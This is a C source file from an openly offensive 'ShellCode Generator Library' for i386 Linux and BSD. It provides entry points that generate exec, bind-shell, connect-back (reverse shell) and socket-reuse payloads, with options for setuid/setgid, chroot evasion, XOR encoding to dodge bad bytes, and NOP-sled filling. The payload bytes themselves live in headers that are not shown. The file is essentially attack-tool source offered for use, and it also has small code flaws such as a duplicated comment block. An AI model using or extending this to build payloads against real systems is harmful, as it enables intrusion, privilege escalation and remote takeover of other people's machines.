/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include "codes.h"
#include "version.h"
#include "i386.h"
#include "i386_linux.h"
#include "i386_bsd.h"

int inizialized = 0;


/*
 * Function:    version()
 * Parameters:
 * Return:      char *          the pointer to the actual libShellCode version
 * Description: Return the actual libShellCode version
 *
 */

char *libShellCode_version()
{
  return LIBSHELLCODE_VERSION;
}


/*
 * Function:    matrix_initialize()
 * Parameters:
 * Return:
 * Description: Initialize the matrix with all the functions
 *
 */

void matrix_initialize()
{
  if (inizialized == 1) return;

  codes[I386][ALL][INIT_CODES] = initialize_i386_codes;
  codes[I386][LINUX][INIT_CODES] = initialize_i386_linux_codes;
  codes[I386][BSD][INIT_CODES] = initialize_i386_bsd_codes;

  codes[I386][ALL][FREE_CODES] = free_i386_codes;
  codes[I386][LINUX][FREE_CODES] = free_i386_linux_codes;
  codes[I386][BSD][FREE_CODES] = free_i386_bsd_codes;

  write_SC[I386][ALL] = NULL;  // Must be NULL
  write_SC[I386][LINUX] = generate_i386_linux_write_SC;
  write_SC[I386][BSD] = generate_i386_bsd_write_SC;

  file_write_SC[I386][ALL] = NULL;  // Must be NULL
  file_write_SC[I386][LINUX] = generate_i386_linux_file_write_SC;
  file_write_SC[I386][BSD] = generate_i386_bsd_file_write_SC;

  exec_SC[I386][ALL] = NULL;  // Must be NULL
  exec_SC[I386][LINUX] = generate_i386_linux_exec_SC;
  exec_SC[I386][BSD] = generate_i386_bsd_exec_SC;

  bind_SC[I386][ALL] = NULL;  // Must be NULL
  bind_SC[I386][LINUX] = generate_i386_linux_bind_SC;
  bind_SC[I386][BSD] = generate_i386_bsd_bind_SC;

  connect_back_SC[I386][ALL] = NULL;  // Must be NULL
  connect_back_SC[I386][LINUX] = generate_i386_linux_connect_back_SC;
  connect_back_SC[I386][BSD] = generate_i386_bsd_connect_back_SC;

  socket_reuse_SC[I386][ALL] = NULL;  // Must be NULL
  socket_reuse_SC[I386][LINUX] = generate_i386_linux_socket_reuse_SC;
  socket_reuse_SC[I386][BSD] = generate_i386_bsd_socket_reuse_SC;

  nops[I386] = generate_i386_nops;

  inizialized = 1;
}



/*
 * Function:    initialize_codes()
 * Parameters:
 * Return:
 * Description: Initialize the codes used to build the ShellCodes
 *
 */

void initialize_codes(int arch, int os)
{
  codes[arch][ALL][INIT_CODES]();
  codes[arch][os][INIT_CODES]();
}


/*
 * Function:    free_codes()
 * Parameters:
 * Return:
 * Description: Free the memory used for the codes
 *
 */

void free_codes(int arch, int os)
{
  codes[arch][ALL][FREE_CODES]();
  codes[arch][os][FREE_CODES]();
}


/*
 * Function:    generate_write_SC()
 * Parameters:
 * Return:
 * Description: Call the correct function to generate a write ShellCode.
 *
 */

char *generate_write_SC(int arch, int os, int out, char *message, int setuid, int setgid, int cripted)
{
  matrix_initialize();
  return write_SC[arch][os](out, message, setuid, setgid, cripted);
}


/*
 * Function:    generate_file_write_SC()
 * Parameters:
 * Return:
 * Description: Call the correct function to generate a file write ShellCode.
 *
 */

char *generate_file_write_SC(int arch, int os, char *file, char *message, int setuid, int setgid, int chroot_evasion, int cripted)
{
  matrix_initialize();
  return file_write_SC[arch][os](file, message, setuid, setgid, chroot_evasion, cripted);
}


/*
 * Function:    generate_exec_SC()
 * Parameters:
 * Return:
 * Description: Call the correct function to generate an exec ShellCode.
 *
 */

char *generate_exec_SC(int arch, int os, char *prog, int setuid, int setgid, int chroot_evasion, int exit, int cripted)
{
  matrix_initialize();
  return exec_SC[arch][os](prog, setuid, setgid, chroot_evasion, exit, cripted);
}


/*
 * Function:    generate_bind_SC()
 * Parameters:
 * Return:
 * Description: Call the correct function to generate a bind ShellCode.
 *
 */

char *generate_bind_SC(int arch, int os, char *prog, int setuid, int setgid, int chroot_evasion, int exit, int port, int fork, int cripted)
{
  matrix_initialize();
  return bind_SC[arch][os](prog, setuid, setgid, chroot_evasion, exit, port, fork, cripted);
}


/*
 * Function:    generate_connect_back_SC()
 * Parameters:
 * Return:
 * Description: Call the correct function to generate a connect back ShellCode.
 *
 */

char *generate_connect_back_SC(int arch, int os, char *prog, int setuid, int setgid, int chroot_evasion, int exit, char *ip, int port, int cripted)
{
  matrix_initialize();
  return connect_back_SC[arch][os](prog, setuid, setgid, chroot_evasion, exit, ip, port, cripted);
}


/*
 * Function:    generate_connect_back_SC()
 * Parameters:
 * Return:
 * Description: Call the correct function to generate a connect back ShellCode.
 *
 */

char *generate_socket_reuse_SC(int arch, int os, char *prog, int setuid, int setgid, int chroot_evasion, int exit, char *ip, int port, int cripted)
{
  matrix_initialize();
  return socket_reuse_SC[arch][os](prog, setuid, setgid, chroot_evasion, exit, ip, port, cripted);
}


/*
 * Function:    generate_nops()
 * Parameters:
 * Return:
 * Description: Call the correct function to fill the buffer with alternative 
 *              NOPs.
 *
 */

void *generate_nops(int arch, char *buffer, int len)
{
  matrix_initialize();
  nops[arch](buffer, len);
}


/*
 * Function:    cript()
 * Parameters:  
 * Return:
 * Description: Cript the code
 *
 */

void cript(char *buff, char pad)
{
  int h, lung;

  lung=strlen(buff);

  for (h=0;h<lung;h++)
    {
      buff[h]^=pad;
    }
}


/*
 * Function:    char_rnd_gen()
 * Parameters:  
 * Return:
 * Description: Generate a random character
 *
 */

unsigned char char_rnd_gen()
{
  struct timeval tv;
  gettimeofday(&tv,NULL);
  srand(tv.tv_usec);
  return (char) rand();
}


/*
 * Function:    xor_check()
 * Parameters:  
 * Return:
 * Description: Check if some characters inside the ShellCode are equal to the
 *              byte which the code will be critped with. The result of XORing a
 *              value with itself is 0 which it is not goot for a ShellCode.
 *
 */

int xor_check(char *code, char xor_byte)
{
  int i;
  for (i=0; i<strlen(code); i++)
    {
      if (code[i]==xor_byte) return 1;
    }
  return 0;
}
